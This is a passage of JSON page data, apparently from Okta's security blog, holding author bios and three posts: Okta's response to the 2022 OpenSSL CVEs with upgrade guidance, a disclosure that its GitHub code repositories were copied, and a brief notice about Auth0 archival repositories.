</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3VRUhNsn36rqnvpTCbIgnM/c7b494d1e58fd50e1495da6876a8a450/TP_profile_photo.jpg"},"name":"Tim Peel","jobTitle":"Director, Cyber Threat Research","slug":"tim-peel","node_locale":"en"},{"id":"9e460982-03d4-534b-9941-c9f366f4daea","bio":{"bio":"<p>Prior to joining Okta recently as a Senior Communications Manager, Laremy Legel worked for Amazon Web Services (AWS). Upon joining AWS in 2014, he delivered communications on topics such as Zero Trust, Defense in Depth, Confidential Computing, and global privacy regulations. After bringing two services to market (AWS Artifact and Amazon Macie), Laremy transitioned to assist the CISO of AWS and co-founded the first dedicated cloud security conference, AWS re:Inforce, in 2019.  </p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7EyNo4FLumgJTEON0drsXj/c2bfaa5f68c62faa9138c6163bc86914/LL.jpg"},"name":"Laremy Legel","jobTitle":"Senior Manager, Security Communications","slug":"laremy-legel","node_locale":"en"}]},{"slug":"/2022-OpenSSL","id":"b9fcbb1f-31a9-5d0c-958b-721757021dfb","title":"Okta’s Response to OpenSSL Security Update","date":"2022-11-01T03:59:25+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The OpenSSL Project has announced the availability of a security update (version 3.0.7) that addresses a vulnerability affecting OpenSSL versions 3.0 and above (3.0.0 - 3.0.6).\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The two CVEs are listed 
below:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.openssl.org/news/secadv/20221101.txt\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2022-3602\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.openssl.org/news/secadv/20221101.txt\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2022-3786\",\"marks\":[],\"data\":{}}]}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-2\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Response\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s engineering teams have applied patches and other mitigations, where required.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-2\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer Guidance\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"For both CVEs, the severity level has been listed as “high” and the following information has been made available:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenSSL versions 3.0.0 to 3.0.6 are vulnerable.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenSSL 3.0 users should upgrade to OpenSSL 
3.0.7.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenSSL 1.1.1 and 1.0.2 are not affected.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has assessed that Version 2022.10.0 of the Okta Access Gateway uses an impacted version of OpenSSL. Please see \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://trust.okta.com/security-advisories/okta-access-gateway-advisory-cve-2022-3602-and-cve-2022-3786/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"our advisory\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Update\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": OAG version 2022.11.0 is now available with an updated version of OpenSSL 3.0.7.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"heading-2\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Changelog\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"December 1, 2022, 01:37 UTC - updated to reflect patches and mitigations have been applied.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"November 4, 2022, 23:36 UTC - Updated to reflect new OAG version available.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"November 1, 2022, 03:59 UTC - A previous version of this post 
noted that the OpenSSL Project evaluated one of the vulnerabilities as “Critical”. This has since been downgraded by OpenSSL to “High”.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:38:57.420Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2022/12/okta-code-repositories","id":"acb9d8ba-151a-5a07-888a-bee7a9ea3ceb","title":"Okta Code Repositories","date":"2022-12-21T17:09:19+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"SUMMARY\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": In alignment with our core value of transparency, we are sharing context and details around a recent security event affecting Okta code repositories. There is no impact to any customers, including any HIPAA, FedRAMP or DoD customers. No action is required by customers.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"SCOPE\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The security event detailed below pertains to Okta Workforce Identity Cloud (WIC) code repositories. 
It does not pertain to any Auth0 (Customer Identity Cloud) products.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"EVENT\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": In early December 2022, GitHub alerted Okta about possible suspicious access to Okta code repositories. Upon investigation, we have concluded that such access was used to copy Okta code repositories.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Our investigation concluded that there was no unauthorized access to the Okta service, and no unauthorized access to customer data. Okta does not rely on the confidentiality of its source code for the security of its services. The Okta service remains fully operational and secure.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"As soon as Okta learned of the possible suspicious access, we promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We have since reviewed all recent access to Okta software repositories hosted by GitHub to understand the scope of the exposure, reviewed all recent commits to Okta software repositories hosted with GitHub to validate the integrity of our code, and rotated GitHub credentials. 
We have also notified law enforcement.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We have decided to share this information consistent with our commitment to transparency and partnership with our customers.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:38:57.390Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2022/09/auth0-code-repository-archives-2020-and-earlier","id":"d0c8ad99-a404-51ac-a5fc-31ad1d41370a","title":"Auth0 Code Repository Archives From 2020 and Earlier","date":"2022-09-26T12:39:34+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Notification of Auth0 Code Repository Archives Security Event - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"No Customer Action Required, Auth0 Fully Operational\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In alignment with our core value of transparency, we are communicating about a recent security event related to certain Auth0 archival code repositories; there is no impact to customer data. 
This does not impact any other Okta products.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/blog/auth0-code-repository-archives-from-2020-and-earlier/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Read more\",\"marks\":[],\"data\":{}}]}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:38:57.047Z","secAuthor":[{"id":"5a22e442-84ac-51b8-8b5e-3644b2409a03","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2gSAmLiqN9DEQXci1YqBvH/6d0ec38b369d8ae7a7b10ec93fdb664c/Auth0_logo_0.png"},"name":"Auth0","jobTitle":"","slug":"auth0","node_locale":"en"}]}]}},"pageContext":{"slug":"greg-foss"}},
    "staticQueryHashes": []}